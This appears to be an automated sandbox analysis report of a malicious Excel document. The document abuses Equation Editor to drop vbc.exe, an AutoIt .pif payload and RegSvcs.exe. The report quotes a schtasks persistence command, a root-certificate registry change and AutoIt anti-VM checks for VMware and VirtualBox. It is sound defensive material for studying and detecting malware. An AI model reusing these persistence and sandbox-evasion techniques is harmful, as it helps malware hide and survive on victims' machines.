Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: vbc.exe, 00000004.00000000.447066106.0000000000292000.00000002.00020000.sdmp, vbc.exe.2.dr
Source:	Binary string: C:\Windows\RegSvcs.pdbpdbvcs.pdbegSvcs.pdb source: RegSvcs.exe, 00000006.00000002.666190763.000000000083D000.00000004.00000020.sdmp
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000D.00000002.536198075.0000000000DA2000.00000020.00020000.sdmp, RegSvcs.exe.5.dr

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027E336 push ecx; ret
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027D870 push eax; ret
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC6BD5 push ecx; ret

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FBEE30 LoadLibraryA,GetProcAddress,

Source: C:\Users\Public\vbc.exe

File created: C:\Users\user\33920049\__tmp_rar_sfx_access_check_4531298

Jump to behavior

Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Persistence and Installation Behavior:

Drops PE files with a suspicious file extension

Show sources

Source: C:\Users\Public\vbc.exe

File created: C:\Users\user\33920049\mmuiqlcvwo.pif

Jump to dropped file

Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\33920049\mmuiqlcvwo.pif	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	File created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\asdERTYgh56F[1].exe	Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp7677.tmp'

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File opened: C:\Users\user\AppData\Local\Temp\RegSvcs.exe:Zone.Identifier read attributes | delete

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FE43FF GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_0102A2EA IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR

Yara detected AntiVM autoit script

Show sources

Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2796	Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 2620	Thread sleep count: 4838 > 30
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 2620	Thread sleep time: -48380s >= -30000s
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 2620	Thread sleep count: 113 > 30
Source: C:\Windows\System32\taskeng.exe TID: 236	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 1580	Thread sleep count: 3937 > 30
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 1580	Thread sleep time: -39370s >= -30000s
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 1580	Thread sleep count: 110 > 30

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Thread sleep count: Count: 4838 delay: -10
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Thread sleep count: Count: 3937 delay: -10

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Window / User API: threadDelayed 4838
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Window / User API: threadDelayed 7950
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Window / User API: threadDelayed 1761
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Window / User API: foregroundWindowGot 749
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Window / User API: threadDelayed 3937

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477

Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: VMwaretray.exe
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: VBoxTray.exe_
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: VMwareUser.exe
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") ThenAq
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: If ProcessExists("VBoxTray.exe") ThenD6
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: If ProcessExists("VboxService.exe") ThenfMf
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: VboxService.exex
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: VMwareService.exe
Source: mmuiqlcvwo.pif, 0000000C.00000002.666203454.0000000000914000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: If ProcessExists("VMwaretray.exe") Then
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thenr36\|
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: VBoxTray.exe
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: If ProcessExists("VBoxTray.exe") ThenC
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") ThenU[U
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then48
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: VMwaretray.exek
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: If ProcessExists("VboxService.exe") Thent7n
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: VboxService.exe

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Process information queried: ProcessInformation

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0027D353 VirtualQuery,GetSystemInfo,

